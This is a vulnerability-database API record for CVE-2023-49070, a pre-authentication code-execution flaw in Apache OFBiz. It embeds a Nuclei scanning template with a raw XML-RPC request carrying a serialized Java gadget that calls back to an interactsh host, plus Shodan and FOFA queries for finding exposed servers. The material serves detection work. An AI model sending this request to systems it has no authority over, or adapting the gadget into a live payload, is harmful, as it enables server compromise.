{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-49070/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-49070/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-49070/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-49070/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-49070/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-49070"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-49070"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-49070.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-49070\n\ninfo:\n  name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution\n  author: your3cho\n  severity: critical\n  description: |\n    Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n  impact: |\n    Unauthenticated attackers can exploit unmaintained XML-RPC functionality to execute arbitrary code through Java deserialization, enabling complete server compromise.\n  remediation: Users are recommended to upgrade to version 18.12.10.\n  reference:\n    - https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3\n    - https://seclists.org/oss-sec/2023/q4/257\n    - https://twitter.com/Siebene7/status/1731870759130427726\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-49070\n    - https://issues.apache.org/jira/browse/OFBIZ-12812\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-49070\n    cwe-id: CWE-94\n    epss-score: 0.95368\n    epss-percentile: 0.99867\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apache\n    product: ofbiz\n    shodan-query:\n      - html:\"OFBiz\"\n      - http.html:\"ofbiz\"\n      - ofbiz.visitor=\n    fofa-query:\n      - app=\"Apache_OFBiz\"\n      - body=\"ofbiz\"\n      - app=\"apache_ofbiz\"\n  tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n\n        <?xml version=\"1.0\"?>\n          <methodCall>\n            <methodName>{{randstr}}</methodName>\n            <params>\n              <param>\n              <value>\n                <struct>\n               <member>\n                  <name>test</name>\n                  <value>\n              <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n                  </value>\n                </member>\n              </struct>\n              </value>\n            </param>\n            </params>\n        </methodCall>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - '<name>faultString</name>'\n# digest: 4a0a004730450220372bc88329555feaeddcb4b9b81cd1bb07cd42762f74355cef866325e26f6d93022100ff805d6786ce156d5aa5f3b8d222abf2a9fd8ef423f22652b86c1dc8b8dd4276:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-49070"
}